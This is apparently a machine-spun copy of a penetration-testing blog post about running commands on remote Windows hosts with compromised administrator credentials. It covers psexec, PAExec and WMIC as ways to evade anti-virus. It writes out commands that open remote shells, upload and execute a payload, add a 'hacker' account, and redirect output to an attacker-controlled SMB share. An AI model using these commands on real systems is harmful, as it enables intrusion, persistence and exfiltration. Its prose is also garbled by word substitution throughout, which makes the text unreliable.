-->
Alternative Ways To: Operate Windows Commands Remotely

Alternative Ways To: Operate Windows Commands Remotely

Alternative Ways To: Operate Windows Commands Remotely

Most Penetration Testers volition know in addition to beloved Metasploit’s PsExec module for running commands on remote Windows machines, if you’re non familiar amongst it – it allows yous to guide keep a compromised Local Administrator work organisation human relationship in addition to purpose it to execute commands on the remote car (or to upload Meterpreter of course! These methods all ask the mightiness to write to Admin$ on the remote machine, which basically way a Local Administrator account.

Metasploit’s PsExec

It’s available inwards Metasploit nether exploit/windows/smb/psexec in addition to all it requires is an RHOST, SMBUser in addition to SMBPass
Most Penetration Testers volition know in addition to beloved Metasploit Alternative ways to: Run Windows Commands Remotely

Sometimes however, the psexec module from Metasploit gets eaten past times Anti-virus engines, which is frustrating in addition to delays a tester going most their work. So he’re a twain of tricks for getting to a greater extent than or less AV chop-chop – for when yous simply desire to run your commands in addition to larn dorsum to Starbucks.

PsTools in addition to PsExec

Although Meterpreter’s PsExec is ofttimes picked upwards past times anti-virus, I personally notice that the master PsTool PsExec isn’t! Which is most convenient, download it hither in addition to give it a try: https://technet.microsoft.com/en-gb/sysinternals/bb896649.aspx
It plant something similar this:
psexec \TargetIP -u Admin -p Password1 cmd (Where "cmd" requests that it spawns an interactive ascendancy shell)  

PowerAdmin amongst PaExec

H5N1 squeamish option to PsExec is PaExec available here: http://www.poweradmin.com/paexec/, its usage is basically the same, attempt this:
PAExec \TargetIP -u Admin -p Password1 -s cmd.exe
Don’t experience similar a ascendancy vanquish but instead desire to upload your ain tools? (or veil-evasion payload perhaps…), in addition to thus give this ane a shot:
PAExec \TargetIP -u Admin -p Password1 -i -c Payload.exe
This volition upload payload.exe to the remote car in addition to execute it!

WMIC

Finally, when all else fails I line out WMIC, which although it’s an older method it seems to guide keep fallen out of usage in addition to many testers I’ve worked amongst are either unaware of it, or guide keep forgotten of its existence. Easy to purpose though, something similar this:
wmic /node:TargetIP /username:Admin /password:Password1 procedure telephone band exercise "add user hacker Hacker1 /add"
The commands hither execute blindly, which whatsoever Tester worth her common salt tin bargain with, but a quick hack volition larn yous the ascendancy output. Spin upwards a network part that tin endure written past times the compromised user (or “Everybody”) in addition to yous tin redirect the output to an SMB share!
wmic /node:TargetIP /username:Admin /password:Password1 procedure telephone band exercise "ipconfig >> \AttcackerIPresults.txt"
So that’s few unlike ways of achieving the same thing, but to a greater extent than ofttimes than non it’s ever skillful to guide keep a Plan B in addition to C, peculiarly when anti-virus is getting a flake big for its boots!
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser